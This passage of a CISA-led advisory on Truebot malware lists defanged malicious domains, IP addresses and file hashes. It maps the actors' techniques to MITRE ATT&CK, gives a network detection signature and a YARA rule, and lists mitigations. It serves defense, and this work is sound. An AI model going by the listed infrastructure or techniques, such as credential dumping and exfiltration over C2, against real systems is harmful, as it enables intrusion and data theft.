792623e143ddd49c36f6868e948febb0c9e19cd3
80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9
fuanshizmo[.]com
qweastradoc[.]com
ee1ccb6a0e38bf95e44b73c3c46268c5
62f5a16d1ef20064dd78f5d934c84d474aca8bbe
0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3
qweastradoc[.]com
82d4025b84cf569ec82d21918d641540
bb32c940f9ca06e7e8533b1d315545c3294ee1a0
c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c
qweastradoc[.]com
dbecfe9d5421d319534e0bfa5a6ac162
9e7a2464f53ce74d840eb84077472bc29fd1ba05
c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d
qweastradoc[.]com
b7fed593e8eb3646f876367b56725e6c
44090a7858eceb28bc111e1edd2f0dc98047afb2
ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885
hiperfdhaus[.]com
8e2b823aac6c9e11fcabecb1d8c19adf
77ad34334a370d85ca5e77436ed99f18b185eee3
a30e1f87b78d1cd529fbe2afdd679c8241d3baab175b2f083740263911a85304
hiperfdhaus[.]com
8a94163ddf956abd0ea92d89db0034e5
abc96032071adeb6217f0a5ba1aff55dc11f5438
b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf
guerdofest[.]com
65fb9572171b903aa31a325f550d8778
d8bd44b7a8f136e29b31226f4edf566a4223266c
d5bbcaa0c3eeea17f12a5cc3dbcaffff423d00562acb694561841bcfe984a3b7
nefosferta[.]com
d9d85bdb6a3ac60a8ba6776c661dbace
78e38e522b1765efb15d0585e13c1f1301e90788
092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875
nefosferta[.]com
20643549f19bed9a6853810262622755
c8227dcc1cd6ecc684de8c5ea9b16e3b35f613f1
1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49
nefosferta[.]com
e9299fc9b7daa0742c28bfc4b03b7b25
77360abc473dc65c8bdd73b6459b9ea8fddb6f1d
22e3f4602a258e92a0b8deb5a2bd69c67f4ac3ca67362a745178848a9da7a3cc
nefosferta[.]com
775fb391db27e299af08933917a3acda
eaaa5e68956a3a3f6113e965199f479e10ae9956
2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7
nefosferta[.]com
f4045710c99d347fe6dfa2c0fcadde29
b7bffdbbaf817d149bbd061070a2d171449afbfc
32ae88cddeeeec255d6d9c827f6bffc7a95e9ea7b83a84a79ff793735a4b4ed7
nefosferta[.]com
587acecdb9491e0897d1067eb02e7c8d
a9eb1ac4b85d17da3a2bae5835c7e862d481c189
55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e
nefosferta[.]com
0bae65245e5423147fce079de29b6136
f24232330e6f428bfbb6b9d8154db1c4046c2fc2
6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727
nefosferta[.]com
5022a85b39a75ebe2bc0411d7b058b2e
a9040ac0e9f482454e040e2a7d874ddc50e6f6ce
68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89
nefosferta[.]com
6a2f114a8995dbeb91f766ac2390086e
edac3cf9533b6f7102f6324fadb437a0814cc680
72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d
nefosferta[.]com
e9115cc3280c16f9019e0054e059f4b8
dad01b0c745649c6c8b87dbeb7ab549ed039515d
7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00
nefosferta[.]com
b54cc9a3dd88e478ea601dfd5b36805e
318fdfec4575d1530a41c80274aa8caae7b7f631
7c607eca4005ba6415e09135ef38033bb0b0e0ff3e46d60253fc420af7519347
nefosferta[.]com
f129c12b1bda7426f6b31682b42ee4b0
5bb804153029c97fe23517ae5428a591c3c63f28
7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63
nefosferta[.]com
f68aa4c92dd30bd5418f136aaf6c07d6
aa56f43e39d114235a6b1d5f66b593cc80325fa4
7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca
nefosferta[.]com
acac995cee8a6a75fa79eb41bdffa53f
971a00a392b99f64a3886f40b6ef991e62f0fe2f
97bae3587f1d2fd35f24eb214b9dd6eed95744bed62468d998c7ef55ff8726d4
nefosferta[.]com
36057710279d9f0d023cb5613aa76d5e
e4dd1f8fc4e44c8fd0e25242d994c4b59eed6939
97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0
nefosferta[.]com
37e6904d84153d1435407f4669135134
1dcd85f7364ea06cd595a86e3e9be48995d596e9
bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9
nefosferta[.]com
4f3916e7714f2a32402c9d0b328a2c91
87a692e3592f7b997c7d962919e243b665f2be36
c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887
nefosferta[.]com
d9daaa0df32b0bb01a09e500fc7f5881
f9cb839adba612db5884e1378474996b4436c0cd
c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490
nefosferta[.]com
c87fb9b9f6c343670bed605420583418
f05cf0b026b2716927dac8bcd26a2719ea328964
c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0
nefosferta[.]com
2be64efd0fa7739123b26e4b70e53c5c
318fdfec4575d1530a41c80274aa8caae7b7f631
ed38c454575879c2546e5fccace0b16a701c403dfe3c3833730d23b32e41f2fe
Malicious Domain
IP Addresses
Files
SHA256
Dremmfyttrred[.]com
45.182.189[.]103
94.142.138[.]61
172.64.155[.]188
104.18.32[.]68
Update[.]exe
Document_26_apr_2443807[.]exe
3ujwy2rz7v[.]exe
fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040
droogggdhfhf[.]com
3LXJyA6Gf[.]exe
7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 6-16 for all referenced cyber threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title
ID
Use
Replication Through Removable Media
T1091
Cyber threat actors use removable media drives to deploy Raspberry Robin malware.
Drive-by Compromise
T1189
Cyber threat actors embed malicious links or attachments within web domains to gain initial access.
Exploit Public-Facing Application
T1190
Cyber threat actors are exploiting Netwrix vulnerability CVE-2022-31199 for initial access with follow-on capabilities of lateral movement through remote code execution.
Phishing
T1566.002
Truebot actors can send spear phishing links to gain initial access.
Technique Title
ID
Use
Command and Scripting Interpreter
T1059
Cyber threat actors have been observed dropping cobalt strike beacons as a reverse shell proxy to create persistence within the compromised network.
Cyber threat actors use FlawedGrace to receive PowerShell commands over a C2 channel to deploy additional tools.
Shared Modules
T1129
Cyber threat actors can deploy malicious payloads through obfuscated share modules.
User Execution: Malicious Link
T1204.001
Cyber threat actors trick users into clicking a link by making them believe they need to perform a Google Chrome software update.
Technique Title
ID
Use
Hijack Execution Flow: DLL Side-Loading
T1574.002
Cyber threat actors use Raspberry Robin, among other toolsets to side-load DLLs to maintain persistence.
Technique Title
ID
Use
Boot or Logon Autostart Execution: Print Processors
T1547.012
FlawedGrace malware manipulates print spooler functions to achieve privilege escalation.
Technique Title
ID
Use
Obfuscated Files or Information
T1027
Truebot uses a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP), to create a GUID.
Obfuscated Files or Information: Binary Padding
T1027.001
Cyber threat actors embed around one gigabyte of junk code within the malware string to evade detection protocols.
Masquerading: Masquerade File Type
T1036.008
Cyber threat actors hide Truebot malware as legitimate appearing file formats.
Process Injection
T1055
Truebot malware has the ability to load shell code after establishing a C2 connection.
Indicator Removal: File Deletion
T1070.004
Truebot malware implements self-deletion TTPs throughout its attack cycle to evade detection.
Teleport exfiltration tool deletes itself after it has completed exfiltrating data to the C2 station.
Modify Registry
T1112
FlawedGrace is able to modify registry programs that control the order in which documents are loaded to a print queue.
Reflective Code Loading
T1620
Truebot malware has the capability to load shell code and deploy various tools to stealthily navigate an infected network.
Technique Title
ID
Use
OS Credential Dumping: LSASS Memory
T1003.001
Cyber threat actors use cobalt strike to gain valid credentials through LSASS memory dumping.
Technique Title
ID
Use
System Network Configuration Discovery
T1016
Truebot malware scans and enumerates the affected system’s domain names.
Process Discovery
T1057
Truebot malware enumerates all running processes on the local host.
System Information Discovery
T1082
Truebot malware scans and enumerates the OS version information, and processor architecture.
Truebot malware enumerates the affected system’s computer names.
System Time Discovery
T1124
Truebot has the ability to discover system time metrics, which enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks.
Software Discovery: Security Software Discovery
T1518.001
Truebot has the ability to discover software security protocols, which aids in defense evasion.
Debugger Evasion
T1622
Truebot malware scans the compromised environment for debugger tools and enumerates them in effort to evade network defenses.
Technique Title
ID
Use
Exploitation of Remote Services
T1210
Cyber threat actors exploit CVE-2022-31199 Netwrix Auditor vulnerability and use its capabilities to move laterally within a compromised network.
Use Alternate Authentication Material: Pass the Hash
T1550.002
Cyber threat actors use cobalt strike to authenticate as valid accounts.
Remote Service Session Hijacking
T1563.001
Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods.
Remote Service Session Hijacking: RDP Hijacking
T1563.002
Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods.
Lateral Tool Transfer
T1570
Cyber threat actors deploy additional payloads to transfer toolsets and move laterally.
Technique Title
ID
Use
Data from Local System
T1005
Truebot malware checks the current version of the OS and the processor architecture and compiles the information it receives.
Truebot gathers and compiles compromised system’s host and domain names.
Screen Capture
T1113
Truebot malware takes snapshots of local host data, specifically processor architecture data, and sends that to a phase 2 encoded data string.
Technique Title
ID
Use
Application Layer Protocol
T1071
Cyber threat actors use teleport exfiltration tool to blend exfiltrated data with network traffic.
Non-Application Protocol
T1095
Cyber threat actors use Teleport and FlawedGrace to send data over custom communication protocol.
Ingress Tool Transfer
T1105
Cyber threat actors deploy various ingress transfer tool payloads to move laterally and establish C2 connections.
Encrypted Channel: Asymmetric Cryptography
T1573.002
Cyber threat actors use Teleport to create an encrypted channel using AES.
Technique Title
ID
Use
Scheduled Transfer
T1029
Teleport limits the data it collects and syncs with outbound organizational data/network traffic.
Data Transfer Size Limits
T1030
Teleport limits the data it collects and syncs with outbound organizational data/network traffic.
Exfiltration Over C2 Channel
T1048
Cyber threat actors blend exfiltrated data with network traffic to evade detection.
Cyber threat actors use the Teleport tool to exfiltrate data over a C2 protocol.
DETECTION METHODS
CISA and authoring organizations recommend that organizations review and implement the following detection signatures, along with:
Win/malicious_confidence100% (W), Trojan:Win32/Tnega!MSR, and Trojan.Agent.Truebot.Gen, as well as the YARA rules below, to help detect Truebot malware.
Detection Signatures
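# Truebot client HTTP header signature (from the CISA/FBI/MS-ISAC/CCCS advisory).
# The hex portion of the content match decodes to "; MSIE 11.0; Windows NT 10.00)", so the
# full header value matched is "Mozilla/112.0 (compatible; MSIE 11.0; Windows NT 10.00)"
# (case-insensitive, established client-to-server flow, HTTP header buffer only).
# Before loading:
#   - replace the placeholder sid:x with a numeric SID from your local rule range; the rule
#     parser rejects a non-numeric sid.
#   - if classtype "http-header" is not defined in your classification.config, add it or map
#     the rule to an existing classtype.
# The published copy used typographic quotes (” ”), which the parser also rejects; they are
# restored to ASCII double quotes here.
alert tcp any any -> any any (msg:"TRUEBOT: Client HTTP Header"; sid:x; rev:1; flow:established,to_server; content:"Mozilla/112.0 (compatible|3b 20 4d 53 49 45 20 31 31 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 30 29|"; http_header; nocase; classtype:http-header; metadata:service http;)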
YARA Rules
CISA developed the following YARA rule to aid in detecting the presence of Truebot malware.
// Detects TRUEBOT downloader samples: at least 5 of the 7 byte patterns below must be present.
// Patterns are written as raw hex; the decoded text is noted next to each so analysts can
// recognise the same artefacts in file or memory dumps without re-decoding. The reference
// sample's SHA256 in the meta block is the same hash listed in the IOC table above.
rule CISA_10445155_01 : TRUEBOT downloader
{
meta:
Author = "CISA Code & Media Analysis"
Incident = "10445155"
Date = "2023-05-17"
Last_Modified = "20230523_1500"
Actor = "n/a"
Family = "TRUEBOT"
Capabilities = "n/a"
Malware_Type = "downloader"
Tool_Type = "n/a"
Description = "Detects TRUEBOT downloader samples"
SHA256 = "7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7"
strings:
// ASCII "dremmfyttrred.com" — a C2 domain that also appears in the IOC tables above
$s1 = { 64 72 65 6d 6d 66 79 74 74 72 72 65 64 2e 63 6f 6d }
// ASCII "Nsu2OdiwodOs2"
$s2 = { 4e 73 75 32 4f 64 69 77 6f 64 4f 73 32 }
// ASCII "YiPumybosaWiWexy"
$s3 = { 59 69 50 75 6d 79 62 6f 73 61 57 69 57 65 78 79 }
// ASCII "repots_error.txt"
$s4 = { 72 65 70 6f 74 73 5f 65 72 72 6f 72 2e 74 78 74 }
// ASCII "Lkjdslfj32oijrfewgw.mp4"
$s5 = { 4c 6b 6a 64 73 6c 66 6a 33 32 6f 69 6a 72 66 65 77 67 77 2e 6d 70 34 }
// UTF-16LE "Trigger12" (interleaved 00 bytes; trailing null of the last character omitted)
$s6 = { 54 00 72 00 69 00 67 00 67 00 65 00 72 00 31 00 32 }
// UTF-16LE "TUrfWesTifsf" (interleaved 00 bytes; trailing null of the last character omitted)
$s7 = { 54 00 55 00 72 00 66 00 57 00 65 00 73 00 54 00 69 00 66 00 73 00 66 }
condition:
// Any five of the seven strings are sufficient for a match.
5 of them
}
INCIDENT RESPONSE
The following steps are recommended if organizations detect a Truebot malware infection and compromise:
MITIGATIONS
CISA and the authoring organizations recommend organizations implement the below mitigations, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services.
For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and co-sealers recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
Reduce threat of malicious actors using remote access tools by:
See the National Security Agency’s Cybersecurity Information sheet, Enforce Signed Software Execution Policies, and additional guidance below:
In addition, CISA, FBI, MS-ISAC, and CCCS recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
REFERENCES
[1] Bishop Fox: Netwrix Auditor Advisory
[2] Talos Intelligence: Breaking the Silence – Recent Truebot Activity
[3] The DFIR Report: Truebot Deploys Cobalt Strike and FlawedGrace
[4] MAR-10445155-1.v1 .CLEAR Truebot Activity Infects U.S. and Canada Based Networks
[5] Red Canary: Raspberry Robin Delivery Vector
[6] Microsoft: Raspberry Robin Worm Part of a Larger Ecosystem Pre-Ransomware Activity
[7] Telsy: FlawedGrace RAT
[8] VMware Security Blog: Carbon Black’s Truebot Detection
[9] GitHub: DFIR Report – Truebot Malware YARA Rule
Additional Sources
Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors (thehackernews.com)
Truebot Analysis Part 1
Truebot Analysis Part 2
Truebot Analysis Part 3
Truebot Exploits Netwrix Vulnerability
TrueBot malware delivery evolves, now infects businesses in the US and elsewhere
Malpedia-Silence Downloader
Printer spooling: what is it and how to fix it? | PaperCut
ACKNOWLEDGEMENTS
VMware’s Carbon Black contributed to this CSA.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, and co-sealers.